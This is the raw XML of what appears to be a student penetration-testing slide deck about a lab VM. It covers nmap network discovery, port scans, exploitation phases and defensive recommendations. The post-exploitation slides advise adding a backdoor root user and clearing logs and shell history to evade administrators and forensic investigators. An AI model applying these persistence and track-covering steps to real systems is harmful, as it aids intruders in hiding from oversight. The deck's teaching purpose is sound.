          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3000584" y="397837"/>
            <a:ext cx="12039600" cy="112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Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr sz="657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6019553" h="11013383" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16019553" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16019553" y="11013383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11013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3968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55" name="Google Shape;355;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="4491990"/>
            <a:ext cx="16230600" cy="137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Post-Exploitation</a:t>
            </a:r>
            <a:endParaRPr sz="96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61" name="Google Shape;361;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="4665310"/>
            <a:ext cx="10768818" cy="1878672"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10768818" h="1878672" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10768818" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10768818" y="1878672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1878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62" name="Google Shape;362;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3000584" y="397837"/>
            <a:ext cx="12039600" cy="112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maintain access</a:t>
            </a:r>
            <a:endParaRPr sz="657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-228600" y="2980526"/>
            <a:ext cx="10768818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Create New User: Add a backdoor user with root privileges</a:t>
            </a:r>
            <a:endParaRPr sz="32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69" name="Google Shape;369;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3455761" y="5646399"/>
            <a:ext cx="10387921" cy="902463"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10387921" h="902463" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10387921" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10387921" y="902462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="902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70" name="Google Shape;370;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3455761" y="7150638"/>
            <a:ext cx="10387921" cy="957381"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9621813" h="957381" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9621813" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9621813" y="957381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="957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6601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371" name="Google Shape;371;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370144" y="2728705"/>
            <a:ext cx="16559157" cy="224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It's important to hide your actions to avoid detection by system administrators or forensic investigators Techniques:</a:t>
            </a:r>
            <a:endParaRPr sz="319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399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Clear Logs: Delete or modify logs that may contain traces of your activities</a:t>
            </a:r>
            <a:endParaRPr sz="319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399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Delete History: Clear shell history to erase command history</a:t>
            </a:r>
            <a:endParaRPr sz="319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399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Remove Backdoors</a:t>
            </a:r>
            <a:endParaRPr sz="319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1028700" y="674743"/>
            <a:ext cx="16230600" cy="137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Covering Tracks</a:t>
            </a:r>
            <a:endParaRPr sz="96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557" name="Google Shape;557;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="348615"/>
            <a:ext cx="16230600" cy="1226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recommendation</a:t>
            </a:r>
            <a:endParaRPr sz="72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58" name="Google Shape;558;p50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sp>
          <p:nvSpPr>
            <p:cNvPr id="559" name="Google Shape;559;p50"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2503014" y="2503014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2503014" y="1251507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1251507" y="2503014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3754522" y="3754522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3754522" y="2503014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2503014" y="3754522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3754522" y="1251507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1251507" y="3754522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3754522" y="0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0" y="3754522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2503014" y="1251507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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="570" name="Google Shape;570;p50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="0" y="0"/>
            <a:ext cx="3754522" cy="3754522"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5006029" cy="5006029"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="571" name="Google Shape;571;p50"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2503014" y="2503014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2503014" y="1251507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1251507" y="2503014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3754522" y="3754522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3754522" y="2503014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2503014" y="3754522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3754522" y="1251507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1251507" y="3754522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3754522" y="0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0" y="3754522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4E52"/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2503014" y="1251507"/>
              <a:ext cx="1251507" cy="1251507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82" name="Google Shape;582;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703480" y="1958928"/>
            <a:ext cx="16555820" cy="629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7530" marR="0" lvl="1" indent="-2787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80"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="258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Regularly update and patch the operating system and software to ensure that known vulnerabilities are addressed.</a:t>
            </a:r>
            <a:endParaRPr sz="2580" b="0" i="0" u="none" strike="noStrike" cap="non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57530" marR="0" lvl="1" indent="-2787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80"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="258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Implement robust password policies, including strong passwords and regular password changes.</a:t>
            </a:r>
            <a:endParaRPr sz="2580" b="0" i="0" u="none" strike="noStrike" cap="non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57530" marR="0" lvl="1" indent="-2787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80"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="258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Limit user privileges and ensure that users only have access to necessary resources and services.</a:t>
            </a:r>
            <a:endParaRPr sz="2580" b="0" i="0" u="none" strike="noStrike" cap="non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57530" marR="0" lvl="1" indent="-2787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80"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="258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Use secure protocols for remote access, such as SSH, and disable unnecessary services.</a:t>
            </a:r>
            <a:endParaRPr sz="2580" b="0" i="0" u="none" strike="noStrike" cap="non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57530" marR="0" lvl="1" indent="-2787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80"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="258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Regularly monitor system logs and network traffic to detect and respond to potential security incidents.</a:t>
            </a:r>
            <a:endParaRPr sz="2580" b="0" i="0" u="none" strike="noStrike" cap="non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57530" marR="0" lvl="1" indent="-2787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80"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="258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Implement a web application firewall (WAF) to protect against SQL injection and other web-based attacks.</a:t>
            </a:r>
            <a:endParaRPr sz="2580" b="0" i="0" u="none" strike="noStrike" cap="non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57530" marR="0" lvl="1" indent="-2787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80"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="258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Use secure coding practices and validate user input to prevent SQL injection vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr sz="2580" b="0" i="0" u="none" strike="noStrike" cap="non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57530" marR="0" lvl="1" indent="-2787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80"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="258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Use a reputable security scanner, such as Nikto, to identify potential vulnerabilities and weaknesses.</a:t>
            </a:r>
            <a:endParaRPr sz="2580" b="0" i="0" u="none" strike="noStrike" cap="non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57530" marR="0" lvl="1" indent="-2787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80"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="258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Implement a incident response plan to quickly respond to and contain security incidents.</a:t>
            </a:r>
            <a:endParaRPr sz="2580" b="0" i="0" u="none" strike="noStrike" cap="non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557530" marR="0" lvl="1" indent="-2787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80"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="258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Provide regular security awareness training to users to educate them on safe computing practices and the importance of security.</a:t>
            </a:r>
            <a:endParaRPr sz="2580" b="0" i="0" u="none" strike="noStrike" cap="non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13529441" y="5406672"/>
            <a:ext cx="5309822" cy="5648746"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5309822" h="5648746" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5309822" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5309822" y="5648746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5648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39" name="Google Shape;139;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="1343031"/>
            <a:ext cx="10611580" cy="155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Methodology</a:t>
            </a:r>
            <a:endParaRPr sz="9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40" name="Google Shape;140;p5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190625" y="5133975"/>
            <a:ext cx="16068675" cy="0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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="4981575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5317258" y="4972050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9605817" y="4972050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13894375" y="4972050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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="5972175"/>
            <a:ext cx="3364925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Reconnaissance </a:t>
            </a:r>
            <a:endParaRPr sz="28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5317258" y="5972175"/>
            <a:ext cx="3364925" cy="182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Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr sz="28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9605817" y="5972175"/>
            <a:ext cx="3364925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Exploitation</a:t>
            </a:r>
            <a:endParaRPr sz="28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13894375" y="5972175"/>
            <a:ext cx="3364925" cy="90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Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr sz="28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and white rectangular background with a white and black padlock&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FE94E38-444F-A2F3-C56B-A256B67C56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67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900" y="993253"/>
            <a:ext cx="15433549" cy="854127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900" y="993253"/>
            <a:ext cx="15433549" cy="8541272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4B4F77A3-0525-F285-908C-486E42DE9B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4" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1257300" y="350710"/>
            <a:ext cx="15703299" cy="883310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5057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9002" y="1635679"/>
            <a:ext cx="14197848" cy="7857407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9002" y="1635679"/>
            <a:ext cx="14197848" cy="7857407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177C86-FBE2-E2F7-740C-CA20DF3A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79" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1921000" y="1016502"/>
            <a:ext cx="14445999" cy="812587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3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10413" y="252211"/>
            <a:ext cx="1513667" cy="15136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10413" y="252211"/>
            <a:ext cx="1513667" cy="15136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7190" y="6642916"/>
            <a:ext cx="847810" cy="84781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7190" y="6642916"/>
            <a:ext cx="847810" cy="84781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1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900" y="993253"/>
            <a:ext cx="15433549" cy="854127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900" y="993253"/>
            <a:ext cx="15433549" cy="8541272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468BB-610A-0C6F-5C35-C672098E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4" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1257300" y="350710"/>
            <a:ext cx="15703299" cy="883310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94844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9002" y="1635679"/>
            <a:ext cx="14197848" cy="7857407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9002" y="1635679"/>
            <a:ext cx="14197848" cy="7857407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and black text on a white background">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D267576C-5D2F-B99B-158C-9ACC5D61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3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1921000" y="1016502"/>
            <a:ext cx="14445999" cy="812587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3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10413" y="252211"/>
            <a:ext cx="1513667" cy="15136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10413" y="252211"/>
            <a:ext cx="1513667" cy="15136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7190" y="6642916"/>
            <a:ext cx="847810" cy="84781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7190" y="6642916"/>
            <a:ext cx="847810" cy="84781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65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900" y="993253"/>
            <a:ext cx="15433549" cy="854127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900" y="993253"/>
            <a:ext cx="15433549" cy="8541272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5C6DC-F2AA-9887-F3AB-C6D73F8880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4" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1257300" y="350710"/>
            <a:ext cx="15703299" cy="883310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27025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588" name="Google Shape;588;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6063677" y="3981450"/>
            <a:ext cx="6160646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Thank You</a:t>
            </a:r>
            <a:endParaRPr sz="12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54" name="Google Shape;154;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4435522" y="4217711"/>
            <a:ext cx="9039742" cy="184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65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Reconnaissance</a:t>
            </a:r>
            <a:endParaRPr sz="11965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55" name="Google Shape;155;p6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="-1062675" y="5138737"/>
            <a:ext cx="10463359" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="2022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156;p6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="8795355" y="5138737"/>
            <a:ext cx="10463359" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="20222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62" name="Google Shape;162;p7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4936296" y="4142151"/>
            <a:ext cx="10235260" cy="5675917"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10235260" h="5675917" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10235259" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10235259" y="5675917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5675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63" name="Google Shape;163;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1562100" y="1384998"/>
            <a:ext cx="15178408" cy="121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1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Network discovery</a:t>
            </a:r>
            <a:endParaRPr sz="711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1562100" y="2935368"/>
            <a:ext cx="13422789" cy="55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nmap -sn  10.0.2.24/24</a:t>
            </a:r>
            <a:endParaRPr sz="3200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1562100" y="4826952"/>
            <a:ext cx="2793206" cy="55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My target is 10.0.2.8. </a:t>
            </a:r>
            <a:endParaRPr sz="3200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71" name="Google Shape;171;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148004" y="3312504"/>
            <a:ext cx="8213008" cy="4681414"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8213008" h="4681414" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8213007" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8213007" y="4681415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4681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72" name="Google Shape;172;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9186075" y="3822216"/>
            <a:ext cx="8290844" cy="3661991"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8290844" h="3661991" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8290844" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8290844" y="3661992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3661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73" name="Google Shape;173;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602181" y="1993824"/>
            <a:ext cx="5977414" cy="55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Reading VM’s file. I have to edit the host file.</a:t>
            </a:r>
            <a:endParaRPr sz="3200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10925658" y="1712837"/>
            <a:ext cx="5841445" cy="11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On the attacker machine, edit the host file. </a:t>
            </a:r>
            <a:endParaRPr sz="3200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nano /etc/hosts Add IP and host name. </a:t>
            </a:r>
            <a:endParaRPr sz="3200" u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7455303" y="19176"/>
            <a:ext cx="10359507" cy="152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85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SETUP</a:t>
            </a:r>
            <a:endParaRPr sz="8785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58" b="-9257"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81" name="Google Shape;181;p9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7996413" y="1834669"/>
            <a:ext cx="9262887" cy="5618473"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9262887" h="5618473" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9262887" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9262887" y="5618473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5618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AS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Google Shape;182;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1994215" y="3751993"/>
            <a:ext cx="5532090" cy="298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nmap -Pn 10.0.2.8</a:t>
            </a:r>
            <a:endParaRPr sz="32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nmap -Pn -p1000- 10.0.2.8 </a:t>
            </a:r>
            <a:endParaRPr sz="32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There’re </a:t>
            </a:r>
            <a:endParaRPr sz="32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only 2 open ports. </a:t>
            </a:r>
            <a:endParaRPr sz="32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3" name="Google Shape;183;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1994215" y="767354"/>
            <a:ext cx="5532090" cy="24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Port scan </a:t>
            </a:r>
            <a:endParaRPr sz="8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1313</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>213</Paragraphs>
  <Slides>56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Bebas Neue</vt:lpstr>
      <vt:lpstr>Open Sans</vt:lpstr>
      <vt:lpstr>Calibri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M.Samir</dc:creator>
  <cp:lastModifiedBy>Abdalrahaman Khaled</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-21T17:31:20Z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AD9BF14C0E1D4C52B4B091ECCC105826_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.2.0.18283</vt:lpwstr>
  </property>
</Properties>
</file>